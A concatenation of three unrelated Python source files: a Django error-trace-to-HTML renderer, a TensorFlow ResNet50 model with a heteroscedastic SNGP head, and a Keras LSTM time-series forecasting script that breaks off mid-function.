# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from reports.source import SourceLine
class GetETV:
    """Converts a JSON error trace into data ready for HTML rendering.

    Walks the trace tree, assigns nested "scopes" to function calls and
    actions, decides which scopes are shown/opened by default, and collects
    per-scope assumption identifiers. The flattened result is stored in
    ``html_trace``; global declarations (if any) in ``globals``.
    """
    # Indentation width (in &nbsp;) per nesting depth.
    tab_length = 4
    # Identifier of the pseudo-thread holding global variable declarations.
    global_thread = 'global'
    # CSS class used to wrap assume() conditions in highlighted source.
    condition_class = 'SrcHlAssume'
    THREAD_COLORS = [
        '#5f54cb', '#85ff47', '#69c8ff', '#ff5de5', '#dfa720',
        '#0b67bf', '#fa92ff', '#57bfa8', '#bf425a', '#7d909e'
    ]

    def __init__(self, error_trace, user):
        """
        :param error_trace: JSON string with the error trace.
        :param user: user whose ``triangles``/``assumptions`` attributes
            control rendering (NOTE(review): presumably view-preference
            booleans on a profile object -- confirm against callers).
        """
        self.user = user
        self.trace = json.loads(error_trace)
        self._max_line_len = 0          # widest source line number, for padding
        self._curr_scope = 0            # counter backing the _new_scope property
        self.shown_scopes = set()       # scopes expanded by default
        self.assumptions = {}           # assumption text -> numeric id
        self._scope_assumptions = {}    # scope -> list of assumption id strings
        # Order matters: the thread scan also measures _max_line_len, which
        # __get_global_vars and __parse_node rely on for line padding.
        self._threads = self.__get_threads()
        self.globals = self.__get_global_vars()
        self.html_trace = self.__parse_node(self.trace['trace'])

    def __get_threads(self):
        """Collect thread identifiers, the global pseudo-thread first."""
        threads = []
        if self.trace.get('global variable declarations'):
            threads.append(self.global_thread)
        threads.extend(self.__get_child_threads(self.trace['trace']))
        return threads

    def __get_child_threads(self, node_obj):
        """Recursively collect unique thread ids below ``node_obj``.

        Side effect: tracks the widest line number seen (``_max_line_len``).
        """
        threads = []
        if node_obj.get('line'):
            self._max_line_len = max(self._max_line_len, len(str(node_obj['line'])))
        if node_obj['type'] == 'thread':
            # The global pseudo-thread must never appear as a real thread.
            assert node_obj['thread'] != self.global_thread
            threads.append(node_obj['thread'])
        if 'children' in node_obj:
            for child in node_obj['children']:
                for thread_id in self.__get_child_threads(child):
                    if thread_id not in threads:
                        threads.append(thread_id)
        return threads

    def __get_global_vars(self):
        """Build the display data for global variable declarations, or None."""
        if 'global variable declarations' not in self.trace:
            return None
        global_data = {
            'thread': self._html_thread['global'],
            'line': self.__get_line(),
            'offset': ' ',
            'source': _('Global variable declarations'),
            'lines': []
        }
        assert isinstance(self.trace['global variable declarations'], list), 'Not a list'
        for node in self.trace['global variable declarations']:
            global_data['lines'].append({
                'thread': self._html_thread['global'],
                'line': self.__get_line(node['line']),
                'file': self.trace['files'][node['file']],
                'offset': ' ',
                'source': self.__parse_source(node),
                'note': node.get('note'),
                'display': node.get('display')
            })
        return global_data

    @property
    def _new_scope(self):
        """Allocate and return the next scope id (stateful property)."""
        self._curr_scope += 1
        return self._curr_scope

    def __parse_node(self, node, depth=0, thread=None, has_asc_note=False, scope=0):
        """Parse one trace node into a flat list of display rows.

        NOTE(review): unknown node types fall through and return None; the
        trace format is assumed to contain only the four types handled below.
        """
        # Statement
        if node['type'] == 'statement':
            node_data = self.__parse_statement(node, depth, thread, scope)
            if node_data.get('warn'):
                # If statement has warn, show current scope
                self.shown_scopes.add(scope)
            elif node_data.get('note') and not has_asc_note:
                # If statement has note and there are no notes in ascendants then show current scope
                self.shown_scopes.add(scope)
            return [node_data]
        # Thread
        if node['type'] == 'thread':
            thread_scope = self._new_scope
            # Always show functions of each thread root scope
            self.shown_scopes.add(thread_scope)
            children_trace = []
            for child_node in node['children']:
                children_trace.extend(self.__parse_node(
                    child_node, depth=0, thread=node['thread'], has_asc_note=False, scope=thread_scope
                ))
            return children_trace
        # Function call
        if node['type'] == 'function call':
            enter_data = self.__parse_function(node, depth, thread, scope)
            # Precedence: warn OR (note AND no ascendant note) shows the scope.
            if enter_data.get('warn') or enter_data.get('note') and not has_asc_note:
                self.shown_scopes.add(scope)
            return self.__parse_body(enter_data, node, depth, thread, has_asc_note, scope)
        # Action
        if node['type'] == 'action':
            enter_data = self.__parse_action(node, depth, thread, scope)
            if enter_data['relevant']:
                # Show all relevant actions
                self.shown_scopes.add(scope)
            return self.__parse_body(enter_data, node, depth, thread, has_asc_note, scope)

    def __parse_body(self, enter_data, node, depth, thread, has_asc_note, scope):
        """Parse the children of a function/action node inside a fresh scope."""
        new_scope = self._new_scope
        enter_data['inner_scope'] = new_scope
        child_depth = depth + 1
        # Children inherit "has ascendant note" once this node notes/warns.
        child_asc_note = has_asc_note or bool(enter_data.get('note')) or bool(enter_data.get('warn'))
        children_trace = []
        for child_node in node['children']:
            children_trace.extend(self.__parse_node(
                child_node, depth=child_depth, thread=thread, has_asc_note=child_asc_note, scope=new_scope
            ))
        # New scope can be added while children parsing
        if new_scope in self.shown_scopes:
            # Open scope by default if its scope is shown and show action scope
            self.shown_scopes.add(scope)
            enter_data['opened'] = True
        if not self.user.triangles:
            return [enter_data] + children_trace
        # Closing triangle
        exit_data = self.__parse_exit(depth, thread, new_scope)
        return [enter_data] + children_trace + [exit_data]

    def __parse_statement(self, node, depth, thread, scope):
        """Build the display row for a single statement node."""
        statement_data = {
            'type': node['type'],
            'thread': self._html_thread[thread],
            'line': self.__get_line(node['line']),
            'file': self.trace['files'][node['file']],
            'offset': ' ' * (self.tab_length * depth + 1),
            'source': self.__parse_source(node),
            'display': node.get('display'),
            'scope': scope
        }
        # Add note/warn ('violation' upgrades a note to a warning).
        if node.get('note'):
            if node.get('violation'):
                statement_data['warn'] = node['note']
            else:
                statement_data['note'] = node['note']
        # Add assumptions
        if self.user.assumptions:
            statement_data['old_assumptions'], statement_data['new_assumptions'] = self.__get_assumptions(node, scope)
        return statement_data

    def __parse_function(self, node, depth, thread, scope):
        """Build the display row for a function-call node (closed by default)."""
        func_data = self.__parse_statement(node, depth, thread, scope)
        func_data['opened'] = False
        return func_data

    def __parse_action(self, node, depth, thread, scope):
        """Build the display row for an action node (closed by default)."""
        return {
            'type': node['type'],
            'relevant': node.get('relevant', False),
            'thread': self._html_thread[thread],
            'line': self.__get_line(node['line']),
            'file': self.trace['files'][node['file']],
            'offset': ' ' * (self.tab_length * depth + 1),
            'display': node['display'],
            'scope': scope,
            'opened': False
        }

    def __parse_exit(self, depth, thread, scope):
        """Build the closing-triangle row terminating a scope."""
        return {
            'type': 'exit',
            'line': self.__get_line(),
            'thread': self._html_thread[thread],
            'offset': ' ' * (self.tab_length * depth + 1),
            'scope': scope
        }

    def __parse_source(self, node):
        """Render highlighted source; wrap conditions in an assume() span."""
        src_line = SourceLine(node['source'], highlights=node.get('highlight', []), filename='error trace',
                              line=node['line'])
        source_html = src_line.html_code
        # Wrap to assume() conditions
        if node.get('condition'):
            source_html = '<span class="{}">assume</span>({})'.format(self.condition_class, source_html)
        return source_html

    def __get_line(self, line=None):
        """Right-pad a line number to the widest line width ('' when None)."""
        line_str = '' if line is None else str(line)
        line_offset = ' ' * (self._max_line_len - len(line_str))
        return '{0}{1}'.format(line_offset, line_str)

    @cached_property
    def _html_thread(self):
        """Per-thread HTML markers: a colored cell at the thread's column."""
        html_pattern = '{prefix}<span style="background-color:{color};"> </span>{postfix}'
        threads_num = len(self._threads)
        threads_html = {}
        for i, th in enumerate(self._threads):
            threads_html[th] = html_pattern.format(
                prefix=' ' * i,
                # Colors cycle if there are more threads than colors.
                color=self.THREAD_COLORS[i % len(self.THREAD_COLORS)],
                postfix=' ' * (threads_num - i - 1)
            )
        threads_html['global'] = ' ' * threads_num
        return threads_html

    def __get_assumptions(self, node, scope):
        """Return (old, new) '_'-joined assumption id strings for a node.

        Old assumptions are those already active in the scope; new ones come
        from the node's ';'-separated 'assumption' field and are also
        remembered for the scope.
        """
        if not self.user.assumptions:
            return None, None
        old_assumptions = None
        if scope in self._scope_assumptions:
            old_assumptions = '_'.join(self._scope_assumptions[scope])
        cnt = len(self.assumptions)
        new_assumptions = None
        if node.get('assumption'):
            new_assumptions = []
            self._scope_assumptions.setdefault(scope, [])
            for assume in node['assumption'].split(';'):
                if assume not in self.assumptions:
                    self.assumptions[assume] = cnt
                    cnt += 1
                assume_id = str(self.assumptions[assume])
                new_assumptions.append(assume_id)
                self._scope_assumptions[scope].append(assume_id)
            new_assumptions = '_'.join(new_assumptions)
        return old_assumptions, new_assumptions
|
<gh_stars>0
# coding=utf-8
# Copyright 2022 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ResNet50 model with HetSNGP."""
import functools
import string
import edward2 as ed
import tensorflow as tf
# Use batch normalization defaults from Pytorch.
BATCH_NORM_DECAY = 0.9
BATCH_NORM_EPSILON = 1e-5
def MonteCarloDropout(  # pylint:disable=invalid-name
    inputs,
    dropout_rate,
    use_mc_dropout,
    filterwise_dropout):
  """Defines the Monte Carlo dropout layer.

  When `use_mc_dropout` is set, dropout stays active at inference time;
  `filterwise_dropout` drops whole feature-map channels instead of
  individual activations.
  """
  if use_mc_dropout:
    training_mode = True
  else:
    training_mode = None
  if filterwise_dropout:
    mask_shape = [inputs.shape[0], 1, 1, inputs.shape[3]]
  else:
    mask_shape = None
  dropout = tf.keras.layers.Dropout(dropout_rate, noise_shape=mask_shape)
  return dropout(inputs, training=training_mode)
def make_random_feature_initializer(random_feature_type):
  """Maps a random-feature type name to its initializer.

  'orf' -> orthogonal random features, 'rff' -> random Fourier features;
  anything else is passed through unchanged. stddev=0.05 replicates the
  default behavior of tf.keras.initializer.RandomNormal.
  """
  if random_feature_type == 'rff':
    return tf.keras.initializers.RandomNormal(stddev=0.05)
  if random_feature_type == 'orf':
    return ed.initializers.OrthogonalRandomFeatures(stddev=0.05)
  return random_feature_type
def make_conv2d_layer(use_spec_norm,
                      spec_norm_iteration,
                      spec_norm_bound):
  """Defines type of Conv2D layer to use based on spectral normalization."""
  base_layer = functools.partial(tf.keras.layers.Conv2D, padding='same')  # pylint: disable=invalid-name
  if not use_spec_norm:
    return base_layer

  def normed_layer(*conv_args, **conv_kwargs):  # pylint: disable=invalid-name
    # Wrap the plain Conv2D in spectral normalization.
    return ed.layers.SpectralNormalizationConv2D(
        base_layer(*conv_args, **conv_kwargs),
        iteration=spec_norm_iteration,
        norm_multiplier=spec_norm_bound)

  return normed_layer
def bottleneck_block(inputs, filters, stage, block, strides, conv_layer,
                     dropout_layer):
  """Residual block with 1x1 -> 3x3 -> 1x1 convs in main path.

  Note that strides appear in the second conv (3x3) rather than the first (1x1).
  This is also known as "ResNet v1.5" as it differs from He et al. (2015)
  (http://torch.ch/blog/2016/02/04/resnets.html).

  Args:
    inputs: tf.Tensor.
    filters: list of integers, the filters of 3 conv layer at main path
    stage: integer, current stage label, used for generating layer names
    block: 'a','b'..., current block label, used for generating layer names
    strides: Strides for the second conv layer in the block.
    conv_layer: tf.keras.layers.Layer.
    dropout_layer: Callable for dropout layer.

  Returns:
    tf.Tensor.
  """
  filters1, filters2, filters3 = filters
  conv_name_base = 'res' + str(stage) + block + '_branch'
  bn_name_base = 'bn' + str(stage) + block + '_branch'
  # 1x1 reduce.
  x = conv_layer(
      filters1,
      kernel_size=1,
      use_bias=False,
      kernel_initializer='he_normal',
      name=conv_name_base + '2a')(
          inputs)
  x = tf.keras.layers.BatchNormalization(
      momentum=BATCH_NORM_DECAY,
      epsilon=BATCH_NORM_EPSILON,
      name=bn_name_base + '2a')(x)
  x = tf.keras.layers.Activation('relu')(x)
  x = dropout_layer(x)
  # 3x3 spatial conv -- carries the block's stride (ResNet v1.5).
  x = conv_layer(
      filters2,
      kernel_size=3,
      strides=strides,
      padding='same',
      use_bias=False,
      kernel_initializer='he_normal',
      name=conv_name_base + '2b')(
          x)
  x = tf.keras.layers.BatchNormalization(
      momentum=BATCH_NORM_DECAY,
      epsilon=BATCH_NORM_EPSILON,
      name=bn_name_base + '2b')(x)
  x = tf.keras.layers.Activation('relu')(x)
  x = dropout_layer(x)
  # 1x1 expand (no activation before the residual add).
  x = conv_layer(
      filters3,
      kernel_size=1,
      use_bias=False,
      kernel_initializer='he_normal',
      name=conv_name_base + '2c')(
          x)
  x = tf.keras.layers.BatchNormalization(
      momentum=BATCH_NORM_DECAY,
      epsilon=BATCH_NORM_EPSILON,
      name=bn_name_base + '2c')(x)
  # Projection shortcut only when the main-path output shape changed.
  shortcut = inputs
  if not x.shape.is_compatible_with(shortcut.shape):
    shortcut = conv_layer(
        filters3,
        kernel_size=1,
        use_bias=False,
        strides=strides,
        kernel_initializer='he_normal',
        name=conv_name_base + '1')(
            shortcut)
    shortcut = tf.keras.layers.BatchNormalization(
        momentum=BATCH_NORM_DECAY,
        epsilon=BATCH_NORM_EPSILON,
        name=bn_name_base + '1')(shortcut)
    shortcut = dropout_layer(shortcut)
  x = tf.keras.layers.add([x, shortcut])
  x = tf.keras.layers.Activation('relu')(x)
  return x
def group(inputs, filters, num_blocks, stage, strides, conv_layer,
          dropout_layer):
  """Group of residual blocks.

  The first block carries the stage's stride; the remaining blocks use
  stride 1. Block labels are 'a', 'b', 'c', ...
  """
  block_labels = string.ascii_lowercase
  x = inputs
  for block_idx in range(num_blocks):
    x = bottleneck_block(
        x,
        filters,
        stage,
        block=block_labels[block_idx],
        strides=strides if block_idx == 0 else 1,
        conv_layer=conv_layer,
        dropout_layer=dropout_layer)
  return x
def resnet50_hetsngp_add_last_layer(
    inputs, x, num_classes, num_factors, use_gp_layer, gp_hidden_dim, gp_scale,
    gp_bias, gp_input_normalization, gp_random_feature_type,
    gp_cov_discount_factor, gp_cov_ridge_penalty,
    gp_output_imagenet_initializer, temperature, num_mc_samples, eps,
    sngp_var_weight, het_var_weight):
  """Adds the classification head to a ResNet50 trunk and builds the model.

  Using strided conv, pooling, four groups of residual blocks, and pooling, the
  network maps spatial features of size 224x224 -> 112x112 -> 56x56 -> 28x28 ->
  14x14 -> 7x7 (Table 1 of He et al. (2015)).

  Args:
    inputs: inputs
    x: x
    num_classes: Number of output classes.
    num_factors: Number of factors for the heteroscedastic variance.
    use_gp_layer: Whether to use Gaussian process layer as the output layer.
    gp_hidden_dim: The hidden dimension of the GP layer, which corresponds to
      the number of random features used for the approximation.
    gp_scale: The length-scale parameter for the RBF kernel of the GP layer.
    gp_bias: The bias term for GP layer.
    gp_input_normalization: Whether to normalize the input using LayerNorm for
      GP layer. This is similar to automatic relevance determination (ARD) in
      the classic GP learning.
    gp_random_feature_type: The type of random feature to use for
      `RandomFeatureGaussianProcess`.
    gp_cov_discount_factor: The discount factor to compute the moving average of
      precision matrix.
    gp_cov_ridge_penalty: Ridge penalty parameter for GP posterior covariance.
    gp_output_imagenet_initializer: Whether to initialize GP output layer using
      Gaussian with small standard deviation (sd=0.01).
    temperature: Float or scalar `Tensor` representing the softmax
      temperature.
    num_mc_samples: The number of Monte-Carlo samples used to estimate the
      predictive distribution.
    eps: Float. Clip probabilities into [eps, 1.0] softmax or
      [eps, 1.0 - eps] sigmoid before applying log (softmax), or inverse
      sigmoid.
    sngp_var_weight: Weight in [0,1] for the SNGP variance in the output.
    het_var_weight: Weight in [0,1] for the het. variance in the output.

  Returns:
    tf.keras.Model.
  """
  # Spatial features -> per-image feature vector.
  x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)
  if use_gp_layer:
    gp_output_initializer = None
    if gp_output_imagenet_initializer:
      # Use the same initializer as dense
      gp_output_initializer = tf.keras.initializers.RandomNormal(stddev=0.01)
    # Heteroscedastic SNGP output head producing logits only.
    output_layer = functools.partial(
        ed.layers.HeteroscedasticSNGPLayer,
        num_factors=num_factors,
        num_inducing=gp_hidden_dim,
        gp_kernel_scale=gp_scale,
        gp_output_bias=gp_bias,
        normalize_input=gp_input_normalization,
        gp_cov_momentum=gp_cov_discount_factor,
        gp_cov_ridge_penalty=gp_cov_ridge_penalty,
        scale_random_features=False,
        use_custom_random_features=True,
        custom_random_features_initializer=make_random_feature_initializer(
            gp_random_feature_type),
        kernel_initializer=gp_output_initializer,
        temperature=temperature,
        train_mc_samples=num_mc_samples,
        test_mc_samples=num_mc_samples,
        share_samples_across_batch=True,
        logits_only=True,
        eps=eps,
        dtype=tf.float32,
        sngp_var_weight=sngp_var_weight,
        het_var_weight=het_var_weight)
  else:
    # Plain dense classification head.
    output_layer = functools.partial(
        tf.keras.layers.Dense,
        activation=None,
        kernel_initializer=tf.keras.initializers.RandomNormal(stddev=0.01),
        name='fc1000')
  outputs = output_layer(num_classes)(x)
  return tf.keras.Model(inputs=inputs, outputs=outputs, name='resnet50')
def resnet50_hetsngp(input_shape,
                     batch_size,
                     num_classes,
                     num_factors,
                     use_mc_dropout,
                     dropout_rate,
                     filterwise_dropout,
                     use_gp_layer,
                     gp_hidden_dim,
                     gp_scale,
                     gp_bias,
                     gp_input_normalization,
                     gp_random_feature_type,
                     gp_cov_discount_factor,
                     gp_cov_ridge_penalty,
                     gp_output_imagenet_initializer,
                     use_spec_norm,
                     spec_norm_iteration,
                     spec_norm_bound,
                     temperature,
                     num_mc_samples=100,
                     eps=1e-5,
                     sngp_var_weight=1.,
                     het_var_weight=1.,
                     omit_last_layer=False):
  """Builds ResNet50.

  Using strided conv, pooling, four groups of residual blocks, and pooling, the
  network maps spatial features of size 224x224 -> 112x112 -> 56x56 -> 28x28 ->
  14x14 -> 7x7 (Table 1 of He et al. (2015)).

  Args:
    input_shape: Shape tuple of input excluding batch dimension.
    batch_size: The batch size of the input layer. Required by the spectral
      normalization.
    num_classes: Number of output classes.
    num_factors: Number of factors for the heteroscedastic variance.
    use_mc_dropout: Whether to apply Monte Carlo dropout.
    dropout_rate: Dropout rate.
    filterwise_dropout: Dropout whole convolutional filters instead of
      individual values in the feature map.
    use_gp_layer: Whether to use Gaussian process layer as the output layer.
    gp_hidden_dim: The hidden dimension of the GP layer, which corresponds to
      the number of random features used for the approximation.
    gp_scale: The length-scale parameter for the RBF kernel of the GP layer.
    gp_bias: The bias term for GP layer.
    gp_input_normalization: Whether to normalize the input using LayerNorm for
      GP layer. This is similar to automatic relevance determination (ARD) in
      the classic GP learning.
    gp_random_feature_type: The type of random feature to use for
      `RandomFeatureGaussianProcess`.
    gp_cov_discount_factor: The discount factor to compute the moving average of
      precision matrix.
    gp_cov_ridge_penalty: Ridge penalty parameter for GP posterior covariance.
    gp_output_imagenet_initializer: Whether to initialize GP output layer using
      Gaussian with small standard deviation (sd=0.01).
    use_spec_norm: Whether to apply spectral normalization.
    spec_norm_iteration: Number of power iterations to perform for estimating
      the spectral norm of weight matrices.
    spec_norm_bound: Upper bound to spectral norm of weight matrices.
    temperature: Float or scalar `Tensor` representing the softmax
      temperature.
    num_mc_samples: The number of Monte-Carlo samples used to estimate the
      predictive distribution.
    eps: Float. Clip probabilities into [eps, 1.0] softmax or
      [eps, 1.0 - eps] sigmoid before applying log (softmax), or inverse
      sigmoid.
    sngp_var_weight: Weight in [0,1] for the SNGP variance in the output.
    het_var_weight: Weight in [0,1] for the het. variance in the output.
    omit_last_layer: Optional. Omits the last pooling layer if it is set to
      True.

  Returns:
    tf.keras.Model.
  """
  # Shared layer factories: MC dropout and (optionally spec-normed) conv.
  dropout_layer = functools.partial(
      MonteCarloDropout,
      dropout_rate=dropout_rate,
      use_mc_dropout=use_mc_dropout,
      filterwise_dropout=filterwise_dropout)
  conv_layer = make_conv2d_layer(use_spec_norm=use_spec_norm,
                                 spec_norm_iteration=spec_norm_iteration,
                                 spec_norm_bound=spec_norm_bound)
  inputs = tf.keras.layers.Input(shape=input_shape, batch_size=batch_size)
  # Stem: pad + strided 7x7 conv + BN/ReLU + max-pool.
  x = tf.keras.layers.ZeroPadding2D(padding=3, name='conv1_pad')(inputs)
  # TODO(jereliu): apply SpectralNormalization to input layer as well.
  x = tf.keras.layers.Conv2D(
      64,
      kernel_size=7,
      strides=2,
      padding='valid',
      use_bias=False,
      kernel_initializer='he_normal',
      name='conv1')(x)
  x = tf.keras.layers.BatchNormalization(
      momentum=BATCH_NORM_DECAY,
      epsilon=BATCH_NORM_EPSILON,
      name='bn_conv1')(x)
  x = tf.keras.layers.Activation('relu')(x)
  x = dropout_layer(x)
  x = tf.keras.layers.MaxPooling2D(3, strides=2, padding='same')(x)
  # Four residual stages (stages 2-5 in He et al. numbering).
  x = group(
      x, [64, 64, 256],
      stage=2,
      num_blocks=3,
      strides=1,
      conv_layer=conv_layer,
      dropout_layer=dropout_layer)
  x = group(
      x, [128, 128, 512],
      stage=3,
      num_blocks=4,
      strides=2,
      conv_layer=conv_layer,
      dropout_layer=dropout_layer)
  x = group(
      x, [256, 256, 1024],
      stage=4,
      num_blocks=6,
      strides=2,
      conv_layer=conv_layer,
      dropout_layer=dropout_layer)
  x = group(
      x, [512, 512, 2048],
      stage=5,
      num_blocks=3,
      strides=2,
      conv_layer=conv_layer,
      dropout_layer=dropout_layer)
  # Optionally return the trunk without pooling/classification head.
  if omit_last_layer:
    return tf.keras.Model(inputs=inputs, outputs=x, name='resnet50')

  return resnet50_hetsngp_add_last_layer(
      inputs, x, num_classes, num_factors, use_gp_layer, gp_hidden_dim,
      gp_scale, gp_bias, gp_input_normalization, gp_random_feature_type,
      gp_cov_discount_factor, gp_cov_ridge_penalty,
      gp_output_imagenet_initializer, temperature, num_mc_samples, eps,
      sngp_var_weight, het_var_weight)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM, Dropout
from math import sqrt
from matplotlib import pyplot
from numpy import array
"""
Created by <NAME> on 7/25/18.
Email : <EMAIL> or <EMAIL>
Website: http://ce.sharif.edu/~naghipourfar
Github: https://github.com/naghipourfar
Skype: mn7697np
"""
# date-time parsing function for loading the dataset
def parser(x):
    """Parse a shampoo-sales style date token like '3-07' into datetime(1903, 7, 1).

    The '190' prefix reconstructs the four-digit year from the one-digit
    decade used in the dataset. Bug fix: ``pd.datetime`` was deprecated and
    removed in pandas 1.0; use the stdlib ``datetime`` class directly
    (``pd.datetime`` was merely an alias for it, so behavior is unchanged).
    """
    from datetime import datetime
    return datetime.strptime('190' + x, '%Y-%m')
# convert time series into supervised learning problem
def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
    """Frame a (multivariate) time series as a supervised learning table.

    :param data: 2-D array-like of observations (rows = time steps), or a
                 plain list (treated as a single variable).
    :param n_in: number of lag observations (t-n_in ... t-1) used as input.
    :param n_out: number of future observations (t ... t+n_out-1) as output.
    :param dropnan: drop the rows containing NaNs produced by shifting.
    :return: DataFrame with columns named 'var<j>(t-i)' / 'var<j>(t+i)'.
    """
    # idiom fix: isinstance instead of `type(data) is list`
    n_vars = 1 if isinstance(data, list) else data.shape[1]
    df = pd.DataFrame(data)
    cols, names = [], []
    # input sequence (t-n, ... t-1)
    for i in range(n_in, 0, -1):
        cols.append(df.shift(i))
        names += ['var%d(t-%d)' % (j + 1, i) for j in range(n_vars)]
    # forecast sequence (t, t+1, ..., t+n)
    for i in range(n_out):
        cols.append(df.shift(-i))
        if i == 0:
            names += ['var%d(t)' % (j + 1) for j in range(n_vars)]
        else:
            names += ['var%d(t+%d)' % (j + 1, i) for j in range(n_vars)]
    # put it all together
    agg = pd.concat(cols, axis=1)
    agg.columns = names
    # drop rows with NaN values introduced by the shifts
    if dropnan:
        agg.dropna(inplace=True)
    return agg
# create a differenced series
def difference(dataset, interval=1):
    """Return a DataFrame of lag-`interval` differences of `dataset`."""
    deltas = [dataset[idx] - dataset[idx - interval]
              for idx in range(interval, len(dataset))]
    return pd.DataFrame(deltas)
# transform series into train and test sets for supervised learning
def prepare_data(series, n_test, n_lag, n_seq, n_features):
    """Scale the series and split it into train/test supervised arrays.

    :param series: pandas DataFrame of raw observations.
    :param n_test: number of rows reserved for the test split (from the end).
    :param n_lag: number of lag time steps used as input.
    :param n_seq: number of future time steps to predict.
    :param n_features: number of variables per time step.
    :return: (scaler, train, test, y_scaler) — `scaler` transforms full
             supervised rows, `y_scaler` only the target columns.
    """
    # extract raw values and frame them as a supervised problem
    raw_values = series.values
    supervised = series_to_supervised(raw_values, n_lag, n_seq)
    supervised_values = supervised.values
    # rescale values to [-1, 1]
    y_scaler = MinMaxScaler(feature_range=(-1, 1))
    scaler = MinMaxScaler(feature_range=(-1, 1))
    scaled_values = scaler.fit_transform(supervised_values)
    # fit a dedicated scaler on just the target columns so predictions can
    # be inverse-transformed independently of the full feature rows
    # NOTE(review): target column index 5 is hard-coded here and at the
    # call sites — confirm it matches the intended target variable.
    X, y = get_X_y(scaled_values, n_lag, n_seq, n_features, 5)
    y_scaler.fit(y)
    # split into train and test sets
    train, test = scaled_values[0:-n_test], scaled_values[-n_test:]
    return scaler, train, test, y_scaler
def get_X_y(data, n_lag, n_seq, n_features, y_col_idx):
    """Split supervised rows into LSTM inputs X and targets y.

    :param data: 2-D array of supervised rows (lag steps then forecast steps).
    :param n_lag: number of lag time steps per row.
    :param n_seq: number of forecast time steps per row.
    :param n_features: number of variables per time step.
    :param y_col_idx: index (within a time step) of the target variable.
    :return: (X, y) where X is reshaped to [samples, 1 timestep, features].
    """
    # one target column per forecast step, all for the same variable
    y_columns = [n_features * n_lag + y_col_idx + n_features * i
                 for i in range(n_seq)]
    y = data[:, y_columns]
    X = np.delete(data, y_columns, axis=1)
    X = X.reshape(X.shape[0], 1, X.shape[1])
    return X, y
# fit an LSTM network to training data
def fit_lstm(train, n_lag, n_seq, n_batch, nb_epoch, n_neurons):
    """Build and train an LSTM on the scaled supervised training rows.

    :param train: 2-D array of scaled supervised rows (lags then targets).
    :param n_lag: number of lag time steps per row.
    :param n_seq: number of forecast steps (output width).
    :param n_batch: batch size (also baked into the fixed input shape).
    :param nb_epoch: number of training epochs.
    :param n_neurons: number of LSTM hidden units.
    :return: the trained Keras model.
    """
    # NOTE(review): `n_features` is read from the module-level global here,
    # unlike the other helpers which take it as a parameter — confirm.
    # reshape training into [samples, timesteps, features]
    X, y = get_X_y(train, n_lag, n_seq, n_features, 5)
    # design network
    model = Sequential()
    model.add(LSTM(n_neurons, batch_input_shape=(n_batch, X.shape[1], X.shape[2])))
    model.add(Dropout(0.5))
    model.add(Dense(y.shape[1]))
    model.compile(loss='mean_squared_error', optimizer='adam')
    # fit network
    model.fit(X, y, epochs=nb_epoch, batch_size=n_batch, verbose=2, shuffle=False, validation_split=0.3)
    # for i in range(nb_epoch):
    # model.fit(X, y, epochs=1, batch_size=n_batch, verbose=2, shuffle=False)
    # model.reset_states()
    return model
# make one forecast with an LSTM,
def forecast_lstm(model, X, n_batch):
    """Run a single forward pass and return the forecast as a plain list."""
    # the network expects a 3-D batch: [samples, timesteps, features]
    batch = X.reshape(1, 1, -1)
    prediction = model.predict(batch)
    # flatten the single-sample prediction row into a list of values
    return list(prediction[0, :])
# forecast every test row with the fitted LSTM
def make_forecasts(model, n_batch, train, test, n_lag, n_seq):
    """Forecast each row of `test`, returning one list of values per row.

    `train` is unused here; it is kept for call-site compatibility.
    """
    # NOTE(review): relies on the module-level global `n_features` — confirm
    X, _ = get_X_y(test, n_lag, n_seq, n_features, 5)
    return [forecast_lstm(model, X[row], n_batch)
            for row in range(len(test))]
# invert differenced forecast
def inverse_difference(last_ob, forecast):
    """Cumulatively add differenced forecast values back onto `last_ob`.

    :param last_ob: the last observed (undifferenced) value.
    :param forecast: sequence of predicted differences.
    :return: list of undifferenced forecast values.
    """
    # BUG FIX: the original indexed forecast[0] unconditionally, raising
    # IndexError on an empty forecast; the running-sum loop handles it.
    inverted = []
    running = last_ob
    for delta in forecast:
        # each restored value becomes the base for the next step
        running = running + delta
        inverted.append(running)
    return inverted
# inverse data transform on forecasts
def inverse_transform(series, forecasts, scaler, n_test):
    """Map scaled forecasts back to the original value range.

    `series` and `n_test` are kept for interface compatibility; only the
    scaler is applied because differencing is not used here.
    """
    restored = []
    for entry in forecasts:
        scaled_row = array(entry)
        # the scaler expects a 2-D batch, so wrap and then unwrap one row
        unscaled = scaler.inverse_transform([scaled_row])
        restored.append(unscaled[0, :])
    return restored
# evaluate the RMSE for each forecast time step
def evaluate_forecasts(test, forecasts, n_lag, n_seq):
    """Print the RMSE for each forecast horizon t+1 ... t+n_seq."""
    for step in range(n_seq):
        observed = [row[step] for row in test]
        estimated = [fc[step] for fc in forecasts]
        step_rmse = sqrt(mean_squared_error(observed, estimated))
        print('t+%d RMSE: %f' % (step + 1, step_rmse))
# plot the forecasts in the context of the original dataset
def plot_forecasts(series, forecasts, n_test, n_lag, n_seq, training=False):
    """Plot the real series in blue and each forecast segment in red.

    :param series: pandas Series of the true values.
    :param forecasts: list of per-row forecast value lists.
    :param n_test: size of the test window (aligns test-time forecasts).
    :param n_lag: unused here; kept for call-site symmetry.
    :param n_seq: unused here; kept for call-site symmetry.
    :param training: if True, align forecasts from the series start.
    """
    pyplot.figure(figsize=(18, 10))
    pyplot.plot(series.values, label="real Data", color='blue')
    for i in range(len(forecasts)):
        # offset of this forecast segment within the full series
        if training:
            off_s = i
        else:
            off_s = len(series) - n_test + i - 1
        off_e = off_s + len(forecasts[i])
        # anchor each red segment at the last known real value so it
        # connects visually to the blue curve
        yaxis = [series.values[off_s]] + forecasts[i]
        # BUG FIX: yaxis has len(forecasts[i]) + 1 points (the anchor was
        # prepended) but xaxis only had len(forecasts[i]); matplotlib
